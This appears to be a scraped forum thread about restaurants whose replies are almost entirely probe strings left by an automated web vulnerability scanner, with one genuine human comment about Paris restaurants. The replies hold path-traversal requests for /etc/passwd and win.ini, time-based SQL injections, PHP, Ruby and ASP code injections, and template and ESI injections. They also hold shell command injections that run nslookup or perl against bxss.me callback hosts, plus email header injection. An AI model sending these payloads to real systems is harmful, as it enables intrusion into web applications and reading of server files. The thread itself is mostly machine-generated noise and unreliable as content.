./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
file:///etc/passwd
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
/WEB-INF/web.xml
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
'.gethostbyname(lc('hitdx'.'jddddvfz4e8f4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(82).chr(98).chr(65).'
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
".gethostbyname(lc("hitiv"."htqetvlo76cae.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(67).chr(103).chr(78)."
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
/etc/shells
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
c:/windows/win.ini
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
bxss.me
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(118).concat(75).concat(107).concat(86)+(require"socket"
Socket.gethostbyname("hitpx"+"pmdbrhwia6aa9.bxss.me.")[3].to_s)+"
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(97).concat(88).concat(110).concat(69)+(require'socket'
Socket.gethostbyname('hitik'+'kfsqrayza934f.bxss.me.')[3].to_s)+'
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
';print(md5(31337));$a='
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
";print(md5(31337));$a="
re: Justeat
WEB-INF/web.xml
re: Justeat
${@print(md5(31337))}
re: Justeat
WEB-INF\web.xml
re: Justeat
'"
re: Justeat
${@print(md5(31337))}\
re: Justeat
<!--
re: Justeat
'.print(md5(31337)).'
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+917-917-1=0+0+0+1 --
re: Justeat
-1 OR 3+917-917-1=0+0+0+1 --
re: Justeat
-1 OR 2+443-443-1=0+0+0+1
re: Justeat
-1 OR 3+443-443-1=0+0+0+1
re: Justeat
-1' OR 2+553-553-1=0+0+0+1 --
re: Justeat
-1' OR 3+553-553-1=0+0+0+1 --
re: Justeat
-1' OR 2+943-943-1=0+0+0+1 or 'XF4MvSzY'='
re: Justeat
-1' OR 3+943-943-1=0+0+0+1 or 'XF4MvSzY'='
re: Justeat
-1" OR 2+837-837-1=0+0+0+1 --
re: Justeat
-1" OR 3+837-837-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
4ENAdUHW'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 807=(SELECT 807 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 438=(SELECT 438 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 125=(SELECT 125 FROM PG_SLEEP(15))--
re: Justeat
JenQUjgr' OR 269=(SELECT 269 FROM PG_SLEEP(15))--
re: Justeat
2M1azTjj') OR 246=(SELECT 246 FROM PG_SLEEP(15))--
re: Justeat
APaGUcMU')) OR 274=(SELECT 274 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@ORq0w
@Justeat unfortunately don’t have much exp with the casual places - only been to some of the more formal places. I liked Quintessence & Esquisse more than others (Equateur, Effervescence, etc), not none of them made me want to go back often .Might be worth staring a new thread!
re: SU2021
AaGy9tDn
re: SU2021
1*
re: SU2021
1*
re: SU2021
1*
re: SU2021
1*
re: SU2021
-1 OR 2+605-605-1=0+0+0+1
re: SU2021
-1 OR 3+605-605-1=0+0+0+1
re: SU2021
if(now()=sysdate(),sleep(15),0)
re: SU2021
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: SU2021
p6cd8qxk
re: SU2021
1*
re: SU2021
1*
re: SU2021
1*
re: SU2021
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: SU2021
1*
re: SU2021
-1 OR 2+618-618-1=0+0+0+1
re: SU2021
-1 OR 3+618-618-1=0+0+0+1
re: SU2021
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: SU2021
if(now()=sysdate(),sleep(15),0)
re: SU2021
-1; waitfor delay '0:0:15' --
re: SU2021
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: SU2021
-1); waitfor delay '0:0:15' --
re: SU2021
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: SU2021
1 waitfor delay '0:0:15' --
re: SU2021
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: SU2021
oCEAVEuY'; waitfor delay '0:0:15' --
re: SU2021
-1; waitfor delay '0:0:15' --
re: SU2021
-5 OR 707=(SELECT 707 FROM PG_SLEEP(15))--
re: SU2021
-1); waitfor delay '0:0:15' --
re: SU2021
-5) OR 774=(SELECT 774 FROM PG_SLEEP(15))--
re: SU2021
1 waitfor delay '0:0:15' --
re: SU2021
-1)) OR 748=(SELECT 748 FROM PG_SLEEP(15))--
re: SU2021
Eg2eyrhz'; waitfor delay '0:0:15' --
re: SU2021
X6YiMCgy' OR 656=(SELECT 656 FROM PG_SLEEP(15))--
re: SU2021
-5 OR 359=(SELECT 359 FROM PG_SLEEP(15))--
re: SU2021
SuqyWiDz') OR 361=(SELECT 361 FROM PG_SLEEP(15))--
re: SU2021
-5) OR 970=(SELECT 970 FROM PG_SLEEP(15))--
re: SU2021
yBJfwqau')) OR 892=(SELECT 892 FROM PG_SLEEP(15))--
re: SU2021
-1)) OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: SU2021
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: SU2021
WOStXgxy' OR 854=(SELECT 854 FROM PG_SLEEP(15))--
re: SU2021
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: SU2021
l43ixCi4') OR 930=(SELECT 930 FROM PG_SLEEP(15))--
re: SU2021
'||(select 1 from (select pg_sleep(15))x)||'
re: SU2021
RDmxNCNS')) OR 618=(SELECT 618 FROM PG_SLEEP(15))--
re: SU2021
''||(select 1 from (select pg_sleep(15))x)||''
re: SU2021
1'"
re: SU2021
@@eGHSt
re: SU2021
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: SU2021
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: SU2021
'||(select 1 from (select pg_sleep(15))x)||'
re: SU2021
''||(select 1 from (select pg_sleep(15))x)||''
re: SU2021
1'"
re: SU2021
@@qysUc
re: SU2021
1Es7cgO
re: SU2021
response.write(9267441*9747464)
re: SU2021
%0abcc:074625.67-16592.67.6740d.19990.2@bxss.me
re: SU2021
'+response.write(9267441*9747464)+'
re: SU2021
to@example.com>%0d%0abcc:074625.67-16593.67.6740d.19990.2@bxss.me
re: SU2021
"+response.write(9267441*9747464)+"
re: SU2021
<esi:include src="http://bxss.me/rpb.png"/>
re: SU2021
${10000235+10000456}
re: SU2021
../../../../../../../../../../../../../../etc/passwd
re: SU2021
../../../../../../../../../../../../../../windows/win.ini
re: SU2021
file:///etc/passwd
re: SU2021
../../../../../../../../../../../../../../../proc/version
re: SU2021
)
re: SU2021
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: SU2021
!(()&&!|*|*|
re: SU2021
../../../../../../../../../../etc/passwd%00.jpg
re: SU2021
^(#$!@#$)(()))******
re: SU2021
'.gethostbyname(lc('hitws'.'srmeofpq68245.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(71).chr(103).chr(72).'
re: SU2021
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: SU2021
".gethostbyname(lc("hitrt"."bjqcliolb6509.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(82).chr(118).chr(83)."
re: SU2021
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: SU2021
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: SU2021
echo yqmbwv$()\ stcgxn\nz^xyu||a #' &echo yqmbwv$()\ stcgxn\nz^xyu||a #|" &echo yqmbwv$()\ stcgxn\nz^xyu||a #
re: SU2021
/etc/passwd
re: SU2021
&echo dnhyqz$()\ kgmhme\nz^xyu||a #' &echo dnhyqz$()\ kgmhme\nz^xyu||a #|" &echo dnhyqz$()\ kgmhme\nz^xyu||a #
re: SU2021
%2fetc%2fpasswd
re: SU2021
|echo ldydti$()\ svoewn\nz^xyu||a #' |echo ldydti$()\ svoewn\nz^xyu||a #|" |echo ldydti$()\ svoewn\nz^xyu||a #
re: SU2021
/.././.././.././.././.././.././.././../etc/./passwd%00
re: SU2021
(nslookup hitotccvvkhva036c7.bxss.me||perl -e "gethostbyname('hitotccvvkhva036c7.bxss.me')")
re: SU2021
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: SU2021
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: SU2021
$(nslookup hitrutrsovbvn0cb3c.bxss.me||perl -e "gethostbyname('hitrutrsovbvn0cb3c.bxss.me')")
re: SU2021
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: SU2021
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: SU2021
&nslookup hitawtaxifybqa7154.bxss.me&'\"`0&nslookup hitawtaxifybqa7154.bxss.me&`'
re: SU2021
Http://bxss.me/t/fit.txt
re: SU2021
HttP://bxss.me/t/xss.html?%00
re: SU2021
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: SU2021
"+"A".concat(70-3).concat(22*4).concat(112).concat(82).concat(112).concat(88)+(require"socket"
Socket.gethostbyname("hitbk"+"qcwxexvja57ab.bxss.me.")[3].to_s)+"
re: SU2021
&(nslookup hitbtrwhobsjp01346.bxss.me||perl -e "gethostbyname('hitbtrwhobsjp01346.bxss.me')")&'\"`0&(nslookup hitbtrwhobsjp01346.bxss.me||perl -e "gethostbyname('hitbtrwhobsjp01346.bxss.me')")&`'
re: SU2021
http://bxss.me/t/fit.txt%3F.jpg
re: SU2021
bxss.me/t/xss.html?%00
re: SU2021
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: SU2021
'+'A'.concat(70-3).concat(22*4).concat(105).concat(79).concat(107).concat(68)+(require'socket'
Socket.gethostbyname('hitye'+'gkrrswti3b1b7.bxss.me.')[3].to_s)+'
re: SU2021
|(nslookup hithogjprmwcl2e0a2.bxss.me||perl -e "gethostbyname('hithogjprmwcl2e0a2.bxss.me')")
re: SU2021
/etc/shells
re: SU2021
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: SU2021
`(nslookup hitamxfyzjywq6ff1b.bxss.me||perl -e "gethostbyname('hitamxfyzjywq6ff1b.bxss.me')")`
re: SU2021
c:/windows/win.ini
re: SU2021
file:///etc/passwd
re: SU2021
;(nslookup hitrhdowotfab1a562.bxss.me||perl -e "gethostbyname('hitrhdowotfab1a562.bxss.me')")|(nslookup hitrhdowotfab1a562.bxss.me||perl -e "gethostbyname('hitrhdowotfab1a562.bxss.me')")&(nslookup hitrhdowotfab1a562.bxss.me||perl -e "gethostbyname('hitrhdowotfab1a562.bxss.me')")
re: SU2021
bxss.me
re: SU2021
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: SU2021
/\../\../\../\../\../\../\../etc/passwd
re: SU2021
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: SU2021
/WEB-INF/web.xml
re: SU2021
';print(md5(31337));$a='
re: SU2021
C:\WINDOWS\system32\drivers\etc\hosts
re: SU2021
";print(md5(31337));$a="
re: SU2021
../../../../../../../../../../windows/win.ini%00.jpg
re: SU2021
${@print(md5(31337))}
re: SU2021
/../../../../../../../../../../boot.ini
re: SU2021
'"
re: SU2021
${@print(md5(31337))}\
re: SU2021
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: SU2021
<!--
re: SU2021
'.print(md5(31337)).'
re: SU2021
..\..\..\..\..\..\..\..\windows\win.ini
re: SU2021
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: SU2021
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: SU2021
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: SU2021
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: SU2021
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\